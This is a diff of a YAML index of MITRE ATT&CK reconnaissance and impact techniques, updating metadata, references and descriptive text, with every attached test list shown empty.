       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590:
     technique:
@@ -56375,7 +57057,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:23.229Z'
       name: Gather Victim Network Information
       description: |-
         Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -56391,12 +57073,10 @@ reconnaissance:
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593:
     technique:
-      modified: '2022-10-18T22:48:33.286Z'
+      modified: '2024-09-12T19:19:47.759Z'
       name: Search Open Websites/Domains
       description: |-
         Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -56405,16 +57085,16 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
@@ -56427,8 +57107,8 @@ reconnaissance:
         external_id: T1593
       - source_name: SecurityTrails Google Hacking
         description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-        url: https://securitytrails.com/blog/google-hacking-techniques
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
       - source_name: Cyware Social Media
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
@@ -56439,52 +57119,50 @@ reconnaissance:
         url: https://www.exploit-db.com/google-hacking-database
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1597:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
-      type: attack-pattern
-      created: '2020-10-02T17:01:42.558Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1597
-        url: https://attack.mitre.org/techniques/T1597
-      - source_name: D3Secutrity CTI Feeds
-        url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
-        description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
-          Intelligence Feeds. Retrieved October 20, 2020.
-      - source_name: ZDNET Selling Data
-        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
-        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
-          73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-04T13:12:14.469Z'
       name: Search Closed Sources
       description: |-
-        Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+        Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
 
         Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Barbara Louis-Sidney (OWN-CERT)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
+      type: attack-pattern
+      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+      created: '2020-10-02T17:01:42.558Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1597
+        external_id: T1597
+      - source_name: ZDNET Selling Data
+        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+          73 million user records on the dark web. Retrieved October 20, 2020.
+        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1592.003:
     technique:
@@ -56506,7 +57184,7 @@ reconnaissance:
         url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
         description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
           source code and proprietary data dumped online. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:22:46.759Z'
       name: Firmware
       description: |-
         Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
@@ -56522,8 +57200,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.002:
     technique:
@@ -56549,7 +57225,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:33:19.596Z'
       name: Software
       description: |-
         Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -56567,8 +57243,6 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.001:
     technique:
@@ -56590,7 +57264,7 @@ reconnaissance:
         url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:52:40.958Z'
       name: Social Media
       description: |-
         Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -56606,12 +57280,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.001:
     technique:
-      modified: '2023-04-14T23:29:10.396Z'
+      modified: '2024-10-10T13:45:01.069Z'
       name: Credentials
       description: "Adversaries may gather credentials that can be used during targeting.
         Account credentials gathered by adversaries may be those directly associated
@@ -56621,17 +57293,20 @@ reconnaissance:
         elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
         Adversaries may also compromise sites then add malicious content designed
         to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
-        Credential information may also be exposed to adversaries via leaks to online
-        or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
-        breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
-        Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
-        GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
-        may also purchase credentials from dark web or other black-markets. Finally,
-        where multi-factor authentication (MFA) based on out-of-band communications
-        is in use, adversaries may compromise a service provider to gain access to
-        MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
-        this information may reveal opportunities for other forms of reconnaissance
-        (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+        (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+        Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+        GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+        based on out-of-band communications is in use, adversaries may compromise
+        a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+        Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+        adversaries via leaks to online or other accessible data sets (ex: [Search
+        Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+        repositories, etc.). Adversaries may purchase credentials from dark web markets,
+        such as Russian Market and 2easy, or through access to Telegram channels that
+        distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+        2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+        Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+        for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
         or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
         establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
         and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
@@ -56643,6 +57318,7 @@ reconnaissance:
       - Vinayak Wadhwa, Lucideus
       - Lee Christensen, SpecterOps
       - Toby Kohlenberg
+      - Massimo Giaimo, Würth Group Cyber Defence Center
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -56653,7 +57329,7 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
       created: '2020-10-02T14:55:43.815Z'
@@ -56663,6 +57339,10 @@ reconnaissance:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1589/001
         external_id: T1589.001
+      - source_name: Bleeping Computer 2easy 2021
+        description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+          web marketplace for stolen data. Retrieved October 7, 2024.
+        url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
       - source_name: ATT ScanBox
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
@@ -56675,6 +57355,10 @@ reconnaissance:
         description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
           19, 2020.
         url: https://github.com/dxa4481/truffleHog
+      - source_name: Bleeping Computer Stealer Logs 2023
+        description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+          Stealer Logs in Context. Retrieved October 10, 2024.'
+        url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
       - source_name: Register Uber
         description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
           into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -56697,6 +57381,10 @@ reconnaissance:
           Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
           October 19, 2020.
         url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+      - source_name: SecureWorks Infostealers 2023
+        description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+          The Growing Threat from Infostealers. Retrieved October 10, 2024.
+        url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
       - source_name: Register Deloitte
         description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
           Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -56704,9 +57392,8 @@ reconnaissance:
         url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.003:
     technique:
@@ -56765,7 +57452,7 @@ reconnaissance:
         adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
         to access valuable information that can be exfiltrated or used to escalate
         privileges and move laterally. "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Wordlist Scanning
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -56785,7 +57472,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1591.004:
     technique:
@@ -56807,7 +57493,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:39:08.904Z'
       name: Identify Roles
       description: |-
         Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -56823,12 +57509,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598:
     technique:
-      modified: '2023-09-08T20:28:49.600Z'
+      modified: '2024-05-31T04:18:44.570Z'
       name: Phishing for Information
       description: "Adversaries may send phishing messages to elicit sensitive information
         that can be used during targeting. Phishing for information is an attempt
@@ -56897,7 +57581,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Avertium callback phishing
         description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
           PHISHING. Retrieved February 2, 2023.
@@ -56945,31 +57629,12 @@ reconnaissance:
         url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.001:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
-      type: attack-pattern
-      created: '2020-10-02T16:54:23.193Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1595.001
-        url: https://attack.mitre.org/techniques/T1595/001
-      - source_name: Botnet Scan
-        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
-        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
-          a Botnet. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:46:55.039Z'
       name: Scanning IP Blocks
       description: |-
         Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
@@ -56978,19 +57643,41 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Diego Sappa, Securonix
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
 
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+      created: '2020-10-02T16:54:23.193Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1595/001
+        external_id: T1595.001
+      - source_name: Botnet Scan
+        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+          a Botnet. Retrieved October 20, 2020.
+        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1590.001:
     technique:
@@ -57048,7 +57735,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.005:
     technique:
@@ -57069,7 +57755,7 @@ reconnaissance:
       - source_name: Shodan
         url: https://shodan.io
         description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:49.260Z'
       name: Scan Databases
       description: |-
         Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
@@ -57085,8 +57771,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.001:
     technique:
@@ -57112,7 +57796,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.025Z'
       name: Determine Physical Locations
       description: |-
         Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -57128,8 +57812,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.001:
     technique:
@@ -57153,7 +57835,7 @@ reconnaissance:
         url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
         description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
           Pad For Phishing Attacks. Retrieved October 20, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:43:12.843Z'
       name: Spearphishing Service
       description: |-
         Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -57175,13 +57857,11 @@ reconnaissance:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 impact:
   T1561.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:32:05.064Z'
       name: Disk Structure Wipe
       description: "Adversaries may corrupt or wipe the disk data structures on a
         hard drive necessary to boot a system; targeting specific critical systems
@@ -57273,13 +57953,12 @@ impact:
         url: https://www.symantec.com/connect/blogs/shamoon-attacks
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1498.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:54:49.943Z'
       name: Direct Network Flood
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -57288,7 +57967,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
@@ -57305,17 +57983,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
@@ -57340,7 +58013,8 @@ impact:
         url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491.002:
     technique:
@@ -57378,7 +58052,7 @@ impact:
         description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
           Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
           How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:37.539Z'
       name: External Defacement
       description: 'An adversary may deface systems external to an organization in
         an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -57412,12 +58086,10 @@ impact:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_impact_type:
       - Integrity
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1499.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:51.289Z'
       name: OS Exhaustion Flood
       description: |-
         Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -57482,42 +58154,127 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
-  T1499.003:
+  T1485.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
+      modified: '2024-10-16T21:27:02.481Z'
+      name: Lifecycle-Triggered Deletion
+      description: "Adversaries may modify the lifecycle policies of a cloud storage
+        bucket to destroy all objects stored within.  \n\nCloud storage buckets often
+        allow users to set lifecycle policies to automate the migration, archival,
+        or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+        GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+        has sufficient permissions to modify these policies, they may be able to delete
+        all objects at once. \n\nFor example, in AWS environments, an adversary with
+        the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+        API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+        in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+        to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+        adversaries may also perform this action on buckets storing cloud logs for
+        [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+        Datadog S3 Lifecycle CloudTrail Logs)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Storage: Cloud Storage Modification'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+      created: '2024-09-25T13:16:14.166Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1485/001
